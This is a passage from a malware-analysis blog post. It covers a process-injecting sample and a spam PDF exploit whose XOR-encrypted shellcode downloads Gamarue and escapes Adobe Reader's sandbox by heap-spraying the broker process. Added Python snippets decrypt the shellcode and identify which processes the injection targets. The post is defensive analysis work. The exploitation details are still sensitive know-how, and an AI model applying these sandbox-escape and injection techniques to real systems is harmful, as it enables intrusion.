<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1StkU56RsFhAqBrXQhjZcu74ZPb6z9dmKJAoncVnPx6rEssDPzhcdRE4COdbeSTORedYE4CvcXiF9yBHgeee-ucAMK6wH0QT0QQh_UVynzdZIJZ-iMs1V6rRDEBFT3pN2hcKC28iAu4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1StkU56RsFhAqBrXQhjZcu74ZPb6z9dmKJAoncVnPx6rEssDPzhcdRE4COdbeSTORedYE4CvcXiF9yBHgeee-ucAMK6wH0QT0QQh_UVynzdZIJZ-iMs1V6rRDEBFT3pN2hcKC28iAu4/s1600/2.png" height="376" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Code snippet in generating random folder and
malware name</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdo5JDb_GGgWfGyu_uwPbJAJvjisv_Loby1M1gtI-bCKxoKDYDfPli96VkIQS8Yyi65DWbEp9msqPCaf4iWO9uNwuyoQCsKHr2ZyNh8CfdOyljT2HQHiPNmLeBBkn0DLVFzBIqaafi26k/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdo5JDb_GGgWfGyu_uwPbJAJvjisv_Loby1M1gtI-bCKxoKDYDfPli96VkIQS8Yyi65DWbEp9msqPCaf4iWO9uNwuyoQCsKHr2ZyNh8CfdOyljT2HQHiPNmLeBBkn0DLVFzBIqaafi26k/s1600/3.png" height="63" width="400" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<i>Sample
folder and malware name<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: center;">
<i><br /></i></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
Then this malware will execute the created copy of itself using
CreateProcessW.<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3bj1H3rkztQKJ43FYdOQY7hI-FsWkhvIfUsCJQ74yYJmu-PhrCl3ug8k1xnqrksKu_EWj-ZDhizlQ2SBAWNZ0-nhmgP4kb4_JwfUFSWwt8tU8wpIfrpx0KPEAVflfGpEqTummmMcV2h8/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3bj1H3rkztQKJ43FYdOQY7hI-FsWkhvIfUsCJQ74yYJmu-PhrCl3ug8k1xnqrksKu_EWj-ZDhizlQ2SBAWNZ0-nhmgP4kb4_JwfUFSWwt8tU8wpIfrpx0KPEAVflfGpEqTummmMcV2h8/s1600/4.png" height="123" width="320" /></a></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
</div>
<div class="MsoNormal">
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
It enumerates all running processes and checks the SID length
of each one. If the SID length is 0x1c, the malware creates a
thread in the virtual address space of that process through
CreateRemoteThread.<br />
<br /></div>
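What a SID length of 0x1c actually selects is worth working out. A binary SID is Revision (1 byte) + SubAuthorityCount (1) + IdentifierAuthority (6) + 4 bytes per sub-authority, so its length is 8 + 4n; 0x1c means five sub-authorities, the shape of an ordinary account SID S-1-5-21-a-b-c-RID, while well-known SIDs such as LocalSystem (S-1-5-18) are shorter. The code below is an added example, not the post's; the post does not say which SID of each process is compared, so the example assumes the process token's user SID, and the process table is constructed.

```python
"""Classify process token SIDs by binary length, as the 0x1c check does.

Added example, not from the original post. Assumes the malware compares the
length of each process token's user SID; the process table is constructed.
"""
import re

# S-<revision>-<identifier authority>[-<sub-authority>...]
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)?$")


def sid_length(sid: str) -> int:
    """Byte length of the binary SID: 8-byte header + 4 bytes per sub-authority."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid}")
    subs = m.group(3)
    n = subs.count("-") if subs else 0
    return 8 + 4 * n


def targeted(sid: str, wanted: int = 0x1c) -> bool:
    """True when the SID has the length the sample looks for (0x1c = 5 sub-authorities)."""
    return sid_length(sid) == wanted


# Constructed process list with the user SID of each process token.
PROCESSES = [
    ("smss.exe",     "S-1-5-18"),                                          # LocalSystem
    ("svchost.exe",  "S-1-5-19"),                                          # LocalService
    ("explorer.exe", "S-1-5-21-1111111111-2222222222-3333333333-1001"),   # a logged-on user
    ("chrome.exe",   "S-1-5-21-1111111111-2222222222-3333333333-1001"),
    ("winlogon.exe", "S-1-5-18"),
]


def injection_candidates(processes=PROCESSES):
    """Names of the processes the 0x1c check would select: user-account processes."""
    return [name for name, sid in processes if targeted(sid)]


if __name__ == "__main__":
    for name, sid in PROCESSES:
        print(f"{name:14} {sid:50} len=0x{sid_length(sid):x}")
    print("candidates:", injection_candidates())   # ['explorer.exe', 'chrome.exe']
```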
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<br /></div>
</div>
bernadettehttp://www.blogger.com/profile/15725392824740427602noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-28360177156611824162014-07-27T23:09:00.000-07:002014-07-27T23:09:10.735-07:00Wells Fargo Spam: ShellCode analysis<br />
<div class="MsoNormal">
This PDF exploit arrives as an attachment to an email that claims to be from Wells
Fargo Accounting.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Upon inspection of the PDF objects, we can see that one of the objects contains
JavaScript with the following:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<ol>
<li>Image allocation (including a ridiculously large one)</li>
<li>Array allocation</li>
<li>Assembly algorithms</li>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGfjs4gEpEti-h5kXVP_viPTJT-NpMZefZ4AG8OilmAQuUvimIvgcwmW0pnhAddD-vrLWWKIdFnWCZvySfc5MCu9byhz5b-xd6nbLjpTmFQg9BA28aot-QJxqoNcsTQWMKYCoskyWiT2hD/s1600/SuspiciousArray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGfjs4gEpEti-h5kXVP_viPTJT-NpMZefZ4AG8OilmAQuUvimIvgcwmW0pnhAddD-vrLWWKIdFnWCZvySfc5MCu9byhz5b-xd6nbLjpTmFQg9BA28aot-QJxqoNcsTQWMKYCoskyWiT2hD/s1600/SuspiciousArray.jpg" height="82" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Array allocation</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhUCOIJufjjXosHOBdLBKQ6KtBc0EYYLeWqa3fQqs0n76PFDVGYVgR68Ui-OpRJNm6lK6iAhMIm-_5AGcdJBj9GsGWnAR-nhrs6jSIxpKkaRN_d3RIjwcjxhAfywnhqxevuV9bNhuZyQ6/s1600/RawDump.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhUCOIJufjjXosHOBdLBKQ6KtBc0EYYLeWqa3fQqs0n76PFDVGYVgR68Ui-OpRJNm6lK6iAhMIm-_5AGcdJBj9GsGWnAR-nhrs6jSIxpKkaRN_d3RIjwcjxhAfywnhqxevuV9bNhuZyQ6/s1600/RawDump.jpg" height="56" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Raw Dump</td></tr>
</tbody></table>
<div class="MsoNormal">
Closer inspection of the suspicious array gives us what looks to be a
target URL, but it is jumbled.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Reconstructing the given file gives us the following:</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdJg5zdi-lZ4u-tkYVT1nQJS2TV73aP3NeF6Wn8JIes8gj0a2tBjhG-Gv5I3ymDu0t9w_kKbRr8W6kNkWl12b5FygcY7QvSZeOFUX9kYjN7GxWnkrhJIDt9NfGLOXQnwb74dJnuiyrg93z/s1600/FixedDump.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdJg5zdi-lZ4u-tkYVT1nQJS2TV73aP3NeF6Wn8JIes8gj0a2tBjhG-Gv5I3ymDu0t9w_kKbRr8W6kNkWl12b5FygcY7QvSZeOFUX9kYjN7GxWnkrhJIDt9NfGLOXQnwb74dJnuiyrg93z/s1600/FixedDump.jpg" height="47" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: Fixed Dump </td></tr>
</tbody></table>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It looks like this is the shellcode, but from the fixed output alone we cannot
verify what the URL is for.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
A quick look at the code shows that it contains a decryption routine:</div>
<div class="MsoNormal">
<o:p></o:p></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3aXhvagXNzqtdvbxlAvXv-V9NanJ1DSYMNY8Vx30Um8E-J6gRzJ2VNbB58XNL8Eml9_7kd-nVkaEHiDft22u4dFWRQWCsqfT0sYimELrxWC3wBIp2XMixyR9i-VuAqYtvNspHci2pWGSb/s1600/DecryptionOpcodes.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3aXhvagXNzqtdvbxlAvXv-V9NanJ1DSYMNY8Vx30Um8E-J6gRzJ2VNbB58XNL8Eml9_7kd-nVkaEHiDft22u4dFWRQWCsqfT0sYimELrxWC3wBIp2XMixyR9i-VuAqYtvNspHci2pWGSb/s1600/DecryptionOpcodes.jpg" height="52" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4: Decryption loop</td></tr>
</tbody></table>
This particular code is XOR encrypted using the value 0x78EFEEA6.<br />
<br />
Using the key, we now get a more "readable" code.<br />
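Applying that key is a one-liner for an analyst, but the more useful trick is going the other way: recovering an unknown DWORD XOR key from a crib such as "http://" that the decrypted downloader must contain. The code below is an added example, not the post's tooling; it assumes the loop XORs the buffer DWORD by DWORD with the key as a little-endian value, and the encrypted sample is constructed (a fake URL, not the real shellcode).

```python
"""XOR-decrypt a shellcode blob with the DWORD key from the post, and recover
the key from a crib when it is not known.

Added example, not from the original post. Assumption: the decryption loop XORs
the buffer in 4-byte little-endian DWORDs; adjust the width if a sample differs.
"""
import struct
from typing import Optional

KEY = 0x78EFEEA6


def xor_dword(data: bytes, key: int = KEY) -> bytes:
    """XOR data with the little-endian bytes of a 32-bit key, repeating every 4 bytes.

    A trailing partial DWORD is XORed with the low-order key bytes, so the
    function is its own inverse on any length.
    """
    key_bytes = struct.pack("<I", key)
    return bytes(b ^ key_bytes[i % 4] for i, b in enumerate(data))


def recover_key(blob: bytes, crib: bytes = b"http://") -> Optional[int]:
    """Brute-force the DWORD key by assuming the crib appears somewhere in the plaintext.

    At each offset the first 4 crib bytes fix all 4 key bytes (aligned to the
    offset modulo 4); a candidate is accepted only if the full decrypt contains
    the whole crib, which weeds out chance alignments.
    """
    for off in range(len(blob) - 3):
        kb = bytearray(4)
        for j in range(4):
            kb[(off + j) % 4] = blob[off + j] ^ crib[j]
        cand = struct.unpack("<I", bytes(kb))[0]
        if crib in xor_dword(blob, cand):
            return cand
    return None


# Constructed sample: a fake download URL encrypted with the post's key. This
# stands in for the encrypted shellcode; it is not data from the PDF.
PLAIN = b"\x90\x90\x90http://example.invalid/payload.exe\x00"
ENCRYPTED = xor_dword(PLAIN)

if __name__ == "__main__":
    print("decrypted:", xor_dword(ENCRYPTED))
    print("recovered key: 0x%08X" % recover_key(ENCRYPTED))   # 0x78EFEEA6
```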
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJBIqw9-_b7m3tOIXYgmWap6wnI_AEi4HuoSq1Dw97UMW6MGPjiuSxKu1HnE_2oBvGjEJ3ITlvQ5Jf72OYekYQXtTkLgHwmnmopxMiK8jKjsTR1kpjOEaPypgPcvybGh4xgo4eSGWXDnat/s1600/decrypteddump.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJBIqw9-_b7m3tOIXYgmWap6wnI_AEi4HuoSq1Dw97UMW6MGPjiuSxKu1HnE_2oBvGjEJ3ITlvQ5Jf72OYekYQXtTkLgHwmnmopxMiK8jKjsTR1kpjOEaPypgPcvybGh4xgo4eSGWXDnat/s1600/decrypteddump.jpg" height="251" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5: Decrypted Shell Code</td></tr>
</tbody></table>
<br />
Now that the shellcode is decrypted, we can verify the URL.<br />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; text-align: center;"><br /></span>
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; text-align: center;">While harvesting the needed APIs,
the following APIs of interest were loaded:</span><br />
<div align="center" class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4a_erlWkaXm5fufFoBYSzxkgaVIEMlaEW7mDsSoRXG5OrkIMzAc6mFFZh3PCNpDZCrtGAnka2VHM-iTHzQkmpRQcYQKbxRWsk-LE88V_Fh-HsnhTmywyr3YU31NRSvmgb38Dx5UnAH2C/s1600/API_harvest_winexec.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4a_erlWkaXm5fufFoBYSzxkgaVIEMlaEW7mDsSoRXG5OrkIMzAc6mFFZh3PCNpDZCrtGAnka2VHM-iTHzQkmpRQcYQKbxRWsk-LE88V_Fh-HsnhTmywyr3YU31NRSvmgb38Dx5UnAH2C/s1600/API_harvest_winexec.jpg" height="113" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6: API Harvest - Winexec</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIs1pT-fa_7OgC4EDt2OI3BO1VN3chJNA3QDywHrQfwp_F7sVcVz0G0Gz4BxKnmS7AiFtCYXm6TIVWZSwEZzspe4ZrZrrP-sW0GQhFW6UJ82PDEKq3TMSNwgd7Y0e6BVqJZh2Q10817jVF/s1600/API_harvest_URLDownloadtocache.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIs1pT-fa_7OgC4EDt2OI3BO1VN3chJNA3QDywHrQfwp_F7sVcVz0G0Gz4BxKnmS7AiFtCYXm6TIVWZSwEZzspe4ZrZrrP-sW0GQhFW6UJ82PDEKq3TMSNwgd7Y0e6BVqJZh2Q10817jVF/s1600/API_harvest_URLDownloadtocache.jpg" height="137" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7: API Harvest - URLDownloadToCacheA</td></tr>
</tbody></table>
<br />
This indicates that the shellcode is a downloader, and sure enough:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilqmeTvLYLFeFGoMILu6gJypdM9J-uUy7Bip-J_H3_5IhBM_tqrddSaigcgu_13-rpesIkC65sn7oNOMkconPRbX6ovpMz9QJt0sUMkO7IsQ2FgPsC9ALm6ZALKFpnA5hzaFLMdQDDjTTv/s1600/urldownloadtocachefilea.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilqmeTvLYLFeFGoMILu6gJypdM9J-uUy7Bip-J_H3_5IhBM_tqrddSaigcgu_13-rpesIkC65sn7oNOMkconPRbX6ovpMz9QJt0sUMkO7IsQ2FgPsC9ALm6ZALKFpnA5hzaFLMdQDDjTTv/s1600/urldownloadtocachefilea.jpg" height="152" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8: API Usage - URLDownloadToCacheA</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmhVI1oSziS0NDmpTSwKcWFxEu3i9jgKeI7zGuVK_Wr9p4GMvldcA5oMvULAP_W5pnBQEo2FTAWTxWNkjKpsbZSXyIxTEPQJyU0TQ8e_gtfJGWG9xSupLYtmoaskAUTGGL_HYU7zwZ84A/s1600/winexec.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmhVI1oSziS0NDmpTSwKcWFxEu3i9jgKeI7zGuVK_Wr9p4GMvldcA5oMvULAP_W5pnBQEo2FTAWTxWNkjKpsbZSXyIxTEPQJyU0TQ8e_gtfJGWG9xSupLYtmoaskAUTGGL_HYU7zwZ84A/s1600/winexec.jpg" height="90" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9: API Usage - Winexec</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The downloaded file is detected as "<span style="font-family: Calibri, sans-serif; font-size: 11pt;">Worm:Win32/Gamarue.AM</span>" by Microsoft.<br />
<br />
----<br />
<br />
But wait, how can this even run when Adobe Reader runs in a sandbox environment?<br />
<br />
Before we continue, we will introduce a couple of terms to avoid confusion:<br />
<br />
<ul>
<li>Broker Process - the main PDF process; it spawns the Renderer process, which loads the target PDF file</li>
<li>Renderer Process - AKA the sandbox; where the actual PDF is running.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Ts8ZJsZ2KYgX9JSkvxPgf0XSoDGTsUpBv9Hob-UkgHhbIaA1ygGTrJfVCu1AyNcPqUVwaAJWYSHfGdMKNo1fSE6VlobWm4r8E2LbKw7oX6RxpdhTHOKAmVzt-Rk-iKuTAuEuft68EjPb/s1600/Broker_and_Renderer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Ts8ZJsZ2KYgX9JSkvxPgf0XSoDGTsUpBv9Hob-UkgHhbIaA1ygGTrJfVCu1AyNcPqUVwaAJWYSHfGdMKNo1fSE6VlobWm4r8E2LbKw7oX6RxpdhTHOKAmVzt-Rk-iKuTAuEuft68EjPb/s1600/Broker_and_Renderer.jpg" height="166" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 10: AdobeReader seen in Process Explorer</td></tr>
</tbody></table>
The PDF has limited privileges while running in the renderer process, so a malicious PDF must "break out" of the renderer process into its parent, the broker process, which runs at a higher privilege level.<br />
<br />
The malicious PDF achieves EoP (escalation of privilege) by doing the following:<br />
<br />
Allocate space and create a heap spray using the code shown in Figure 11.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinCCu-OyfbWH0x9qF5ZyPXXE4NRCRhZtnYsfQNmaeC4g-6bUyWippieO2rvB458AMmfEqw54ECenmhTw0cRMZ8Xe3Y7MaDNd8JCo6TXUbWI7oeAtAOAwkConVbU2JviPSYtDq8hcQ-Ekjh/s1600/HeapSprayCreation.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinCCu-OyfbWH0x9qF5ZyPXXE4NRCRhZtnYsfQNmaeC4g-6bUyWippieO2rvB458AMmfEqw54ECenmhTw0cRMZ8Xe3Y7MaDNd8JCo6TXUbWI7oeAtAOAwkConVbU2JviPSYtDq8hcQ-Ekjh/s1600/HeapSprayCreation.jpg" height="120" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 11: Heap Spray creation</td></tr>
</tbody></table>
The heap spray contains a minimal version of the original shellcode plus padding of the byte value 0x41 repeated over and over, as seen in Figures 12.1 and 12.2.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-3KqzlpDT5zMTjgG0sngYNOfsdjSZ9Pf7LyZoR82NHdC8ECUp87W1wTk7bxEl_yjhsHdjeGP4fwRo_k2oORYWNgXqsyO3QKssB2QTIDoiabDrFw67UubMorgSKQwLJFSPTNyNm6tF2KF/s1600/HeapSpray1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-3KqzlpDT5zMTjgG0sngYNOfsdjSZ9Pf7LyZoR82NHdC8ECUp87W1wTk7bxEl_yjhsHdjeGP4fwRo_k2oORYWNgXqsyO3QKssB2QTIDoiabDrFw67UubMorgSKQwLJFSPTNyNm6tF2KF/s1600/HeapSpray1.jpg" height="640" width="570" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 12.1 : Heap Spray contents</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DCisxqTeOwuq8KvPjvOUJVZQkZ3KBfryWlYb2x3CfLSn48ZAIlU57_EbK1DeuCWuueEj6PVa_W5P3AOHq1kfypXP3W5Go0U-jqIJhUvP5t1OTQoDGn5WBd9VxX5-mt2prJQwvwcttolj/s1600/HeapSpray2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DCisxqTeOwuq8KvPjvOUJVZQkZ3KBfryWlYb2x3CfLSn48ZAIlU57_EbK1DeuCWuueEj6PVa_W5P3AOHq1kfypXP3W5Go0U-jqIJhUvP5t1OTQoDGn5WBd9VxX5-mt2prJQwvwcttolj/s1600/HeapSpray2.jpg" height="640" width="569" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 12.2: Heap Spray contents</td></tr>
</tbody></table>
The broker process is heap-sprayed by calling HttpSendRequestA with the heap spray address as the lpOptional parameter and a size of 0x0C800000 as dwOptionalLength.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWrVZ9SAt44ALdcP71Rd2m-6-5eeYLYkbE3T4ZO8u-17k06rF4k0_zKG5fRkdNdvfgm4X1jC5t6B7Gb3Rf8XzMamHCrFAugLEgNIhIwE32Y4-ogzvtp6EoC8m-95QFQp_WcZsEZ9r3kQ2T/s1600/HTTPSendRequest.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWrVZ9SAt44ALdcP71Rd2m-6-5eeYLYkbE3T4ZO8u-17k06rF4k0_zKG5fRkdNdvfgm4X1jC5t6B7Gb3Rf8XzMamHCrFAugLEgNIhIwE32Y4-ogzvtp6EoC8m-95QFQp_WcZsEZ9r3kQ2T/s1600/HTTPSendRequest.jpg" height="440" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 13 : Heap Spraying the Broker process VIA HttpSendRequest</td></tr>
</tbody></table>
If we look at the broker process at this point, we see the initially created Heap Spray is now present.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqjb4Uo1Im-ZAS4G93m9pHcCU3vaZFUEIwF-_D5BB8tlz27L5JiKGpM6xV7kGX8ntpGztwwTfe3ilzv9J2gtd371usNuERW9OtcDttEDXmOwXbACi4Sz6PQdsfA5IsllF6FjiA4kM4s0l/s1600/HeapAtBroker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqjb4Uo1Im-ZAS4G93m9pHcCU3vaZFUEIwF-_D5BB8tlz27L5JiKGpM6xV7kGX8ntpGztwwTfe3ilzv9J2gtd371usNuERW9OtcDttEDXmOwXbACi4Sz6PQdsfA5IsllF6FjiA4kM4s0l/s1600/HeapAtBroker.jpg" height="535" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 14: Memory Map at Broker Process</td></tr>
</tbody></table>
To ensure that the heap spray is reached, GlobalAlloc is called (Figure 15), the allocated heap block is overwritten with the target address (0x8080020), and one of those addresses is passed to RegisterWindowMessageW (Figure 16).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirWisuodel_NiDfV9eUhyphenhyphenQ3Fyj3yDaMwJt63XA0dblJJHauTXcwiqamcOyyRBVypCsvRbl1XgWdzvNtHU6ySARnPou8f9A_C9wgUJYzkBtUCDj5Ige4yAJMRGNWFxkHKXn1JkcguK14NMd/s1600/HeapOverwrite.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirWisuodel_NiDfV9eUhyphenhyphenQ3Fyj3yDaMwJt63XA0dblJJHauTXcwiqamcOyyRBVypCsvRbl1XgWdzvNtHU6ySARnPou8f9A_C9wgUJYzkBtUCDj5Ige4yAJMRGNWFxkHKXn1JkcguK14NMd/s1600/HeapOverwrite.jpg" height="584" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 15: Crafted Heap</td></tr>
</tbody></table>
